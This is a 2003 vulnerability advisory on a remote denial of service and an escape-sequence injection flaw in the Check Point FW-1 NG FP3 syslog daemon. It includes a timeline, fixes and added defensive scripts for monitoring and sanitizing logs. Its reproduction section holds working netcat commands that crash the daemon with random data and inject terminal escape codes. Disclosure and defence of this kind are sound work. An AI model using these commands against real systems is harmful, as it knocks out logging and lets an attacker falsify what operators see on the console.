Two vulnerabilities have been found in the syslog daemon of Check Point FW-1. The first allows a successful remote DoS against the syslog daemon of Check Point FW-1 NG FP3 (also FP3 HF1). The second allows syslog messages containing escape sequences, directed at the syslog daemon of Check Point FW-1 NG FP3 (including HF1 and HF2), to pass through unfiltered and cause strange output behavior if the log is viewed on a console.
Credit:
The information has been provided by Dr. Peter Bieringer.
Check Point VPN-1/FW-1 NG FP3 contains a syslog daemon (default: off) that redirects incoming syslog messages from remote hosts (e.g. routers) into Check Point's SmartTracker logging mechanism. This syslog daemon can be crashed remotely and does not restart automatically. The watchdog service does not detect the crash, and no entry appears in the SmartView Tracker regarding the unavailability of the syslog daemon.
Additionally, it prints every character received in a syslog message without any modification: escape sequences are neither filtered nor, for example, expanded to their octal ASCII values.
1. Vulnerability: Successful remote DoS against the syslog daemon of Check Point FW-1 NG FP3 (also FP3 HF1); a remote root exploit may possibly exist.
Tested version and platform:
Check Point FW-1 NG FP3 (with or without HF1) on Red Hat Linux 7.3 running kernel 2.4.9-34
MD5 sum of the binary:
[firewall]# md5sum /opt/CPfw1-50-03/bin/syslog
4eba3458cb05ed30dec6a75a17b0925a /opt/CPfw1-50-03/bin/syslog
Contained in:
[firewall]# rpm -qf /opt/CPfw1-50-03/bin/syslog
CPfw1-50-03
With build time:
[firewall]# rpm -q --queryformat "%{buildtime}\n" CPfw1
1032421147 (Thu 19 Sep 2002 09:39:07 AM MEST)
Note: FP3-HF1 does not update this binary.
Instructions for crashing the syslog daemon of Check Point FW-1 NG FP3:
Start the syslog daemon by enabling it in the firewall object (and running cpstop/cpstart afterwards) or by executing it by hand:
[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
Shutting down kernel logger: [ OK ]
Shutting down system logger: [ OK ]
Starting system logger: [ OK ]
Starting kernel logger: [ OK ]
Segmentation fault <- occurs after receiving a random syslog payload, see below
Check for listening syslog daemon:
[firewall]# netstat -lnptu |grep -w 514
udp 0 0 0.0.0.0:514 0.0.0.0:* $pid/syslog
Note also that this daemon is running as "root":
# ps -ux | grep -w syslog
root $pid 0.0 6.8 148064 8612 ? S 12:17 0:00 syslog 514 all
Send a valid syslog message from a remote host (here also a Linux system):
[evilhost]# echo "<189>19: 00:01:04: Test" | nc -u firewall 514
Send random payload via syslog message from a remote host:
[evilhost]# cat /dev/urandom | nc -u firewall 514
The previously started syslog daemon should crash after a short time; use "netstat" to see whether a daemon is still listening on UDP port 514.
Note: For a clean restart of Check Point's syslog daemon, the firewall service needs to be restarted.
Solutions to prevent the successful DoS attack against syslog service:
- Upgrade to FP3 HF2 as soon as possible, see http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html for more information (available since 14 March 2003).
- Customize your rule set so that the enforcement module accepts syslog messages only from dedicated (and trusted, see below) senders.
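Because the Check Point watchdog does not notice the crashed daemon and the advisory only offers a manual "netstat" check, the following added example (not code from the advisory or from Check Point) turns that check into something a monitoring job can run. It parses the output of "netstat -lnptu" as shown above and reports whether a process is still bound to UDP port 514; the embedded netstat samples are constructed, with a made-up PID, to stand in for the live command.

```python
import re
import subprocess

# Added example, not from the advisory: liveness check for the FW-1 syslog
# daemon based on the "netstat -lnptu" output quoted in the advisory.

# One netstat line: proto, recv-q, send-q, local, foreign, [state], pid/program
NETSTAT_LINE = re.compile(
    r"^(?P<proto>udp|tcp)6?\s+\d+\s+\d+\s+"
    r"(?P<local>\S+)\s+(?P<remote>\S+)\s+(?:LISTEN\s+)?"
    r"(?P<pid>\d+|-)/?(?P<prog>\S*)"
)

# Constructed sample output (PID and sshd line are made up for illustration).
NETSTAT_HEALTHY = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      711/sshd
udp        0      0 0.0.0.0:514             0.0.0.0:*                           1234/syslog
"""

# Same host after the daemon has segfaulted: nothing bound to UDP 514 any more.
NETSTAT_AFTER_CRASH = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      711/sshd
"""


def udp_listeners(netstat_text, port):
    """Return [(local_address, pid, program)] for UDP sockets bound to `port`."""
    found = []
    for line in netstat_text.splitlines():
        m = NETSTAT_LINE.match(line.strip())
        if not m or m.group("proto") != "udp":
            continue
        local = m.group("local")
        # Local address looks like 0.0.0.0:514 or :::514; compare the port part.
        if local.rsplit(":", 1)[-1] != str(port):
            continue
        found.append((local, m.group("pid"), m.group("prog")))
    return found


def syslog_daemon_alive(netstat_text, port=514, program="syslog"):
    """True if a process named `program` still listens on UDP `port`."""
    return any(prog == program for _, _, prog in udp_listeners(netstat_text, port))


if __name__ == "__main__":
    # Run against the live system; exit non-zero so cron/monitoring can alert.
    out = subprocess.run(["netstat", "-lnptu"], capture_output=True, text=True).stdout
    alive = syslog_daemon_alive(out)
    print("FW-1 syslog daemon listening on UDP 514:", alive)
    raise SystemExit(0 if alive else 1)
```

The non-zero exit status is the point: scheduled from cron on the firewall, the script gives the alert that neither the watchdog nor the SmartView Tracker provides, so an operator learns that the daemon is gone and can restart the firewall service.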
2. Vulnerability: Syslog messages containing escape sequences, directed at the syslog daemon of Check Point FW-1 NG FP3 (including HF1 and HF2), pass through unfiltered and can cause strange output behavior if the log is viewed on a console.
Tested version and platform:
Check Point FW-1 NG FP3 (also with HF1 or HF2) on Red Hat Linux 7.3 running kernel 2.4.9-34
Syslog messages from the network are not checked for non-printable characters; therefore, if the log is viewed on a console, the visual output can no longer be trusted at all.
Instructions for demonstration:
Enable receiving of syslog messages from remote hosts by FW-1, e.g. as described above.
View the log on the console by running the following command:
[firewall]# fw log -nfnl
Send some special escape sequences via syslog, e.g.:
[evilhost]# echo -e "<189>19: 00:01:04: Test\a\033[2J\033[2;5m\033[1;31mHACKER~ ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
Take a look at the console again, but don't be too scared for now... Press CTRL-C and reset the console to its standard state by executing:
[firewall]# reset
Attackers might send many other "special" escape sequences; for a Linux destination, see "man console_codes" for more.
Note: The standard syslog daemon on an RHL 7.3 system renders such codes as shown here:
Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q
Solutions to prevent unfiltered console output:
- Filter log output by using "tr" like:
[firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
(all characters with ASCII codes 0-31 and 128-255 decimal, except 10 for LF, are replaced by '*')
- Update Check Point's syslog daemon to a newer version again, once available.
- Improve the rule set as suggested above.
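The "tr" filter above hides the problem but also destroys the evidence: every control character becomes a '*'. The following added example (not code from the advisory or from Check Point) does what the advisory notes the standard RHL 7.3 syslogd does, rendering control characters in caret notation (^G, ^[ ...) and bytes above 127 as octal escapes, so the log stays readable and the injected sequences stay visible; only LF is passed through, as with the "tr" set. It also extracts the terminal escape sequences from a line so that such messages can be alerted on rather than merely sanitized. The sample message is the demonstration payload from this advisory, embedded as a constructed string.

```python
import re
import sys

# Added example, not from the advisory: console-safe rendering of received
# syslog text plus detection of embedded terminal escape sequences.

# ANSI/VT "CSI" sequence: ESC [ parameters intermediates final-byte
CSI = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")

# Constructed sample, taken from the demonstration message in this advisory.
SAMPLE = (
    "<189>19: 00:01:04: Test\a\033[2J\033[2;5m\033[1;31m"
    "HACKER ATTACK\033[2;25m\033[22;30m\033[3q"
)


def sanitize(line, keep="\n"):
    """Render a log line so that it cannot alter the terminal displaying it.

    Printable ASCII (32-126) and the characters in `keep` pass unchanged;
    control characters become caret notation (0x07 -> ^G, 0x1b -> ^[, 0x7f -> ^?);
    everything else becomes a backslash-octal escape such as \\351.
    """
    out = []
    for ch in line:
        code = ord(ch)
        if ch in keep or 32 <= code <= 126:
            out.append(ch)
        elif code < 32:
            out.append("^" + chr(code + 64))
        elif code == 127:
            out.append("^?")
        else:
            out.append("\\%03o" % code)
    return "".join(out)


def terminal_escapes(line):
    """Return the escape sequences found in `line`: complete CSI sequences,
    plus one bare ESC entry for every ESC byte not part of a CSI sequence."""
    seqs = CSI.findall(line)
    stray = line.count("\x1b") - len(seqs)
    return seqs + ["\x1b"] * stray


def has_terminal_escapes(line):
    return bool(terminal_escapes(line))


def filter_log(text):
    """Return [(sanitized_line, flagged)] for each line of log output;
    `flagged` is True when the original line carried terminal escapes."""
    return [(sanitize(ln), has_terminal_escapes(ln)) for ln in text.splitlines()]


if __name__ == "__main__":
    # Usage on the firewall:  fw log -tfnl | python3 sanitize_log.py
    for safe, flagged in filter_log(sys.stdin.read()):
        prefix = "[ESCAPES] " if flagged else ""
        print(prefix + safe)
```

Feeding "fw log -tfnl" through this script instead of "tr" keeps the message content, marks the lines that contained escape sequences, and still leaves nothing that a console would interpret.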
History:
2003-01-17: Syslog crash issue detected by Dr. Peter Bieringer of AERAsec while testing the newly introduced syslog daemon feature in FP3
2003-01-17: Create first internal summary
2003-01-17: Information about the crash sent to vendor by e-mail
2003-01-20: Extend summary to a full advisory
2003-01-23: Unofficial confirmation that information was received by vendor
2003-01-24: Official answer which confirms this issue
2003-01-28: Cosmetic review of advisory
2003-02-28: Detected problem with unfiltered console codes, notified vendor by e-mail (no response about that problem so far)
2003-03-14: Add information about unfiltered console codes, review for publishing
2003-03-17: Pre-final review
2003-03-20: Check Point posted an alert
2003-03-21: Final review and official announcement
2003-03-21: Add note about distribution of this advisory
2003-03-22: Fix some typos
Note: The two-month delay between notifying the vendor and the public release of this advisory was caused by an accepted request from the vendor for a delay, to avoid breaking its already running QA cycle for HF2.
Official word from Check Point:
Additional information about the vulnerability can be viewed by going to: http://www.checkpoint.com/techsupport/alerts/syslog.html or http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html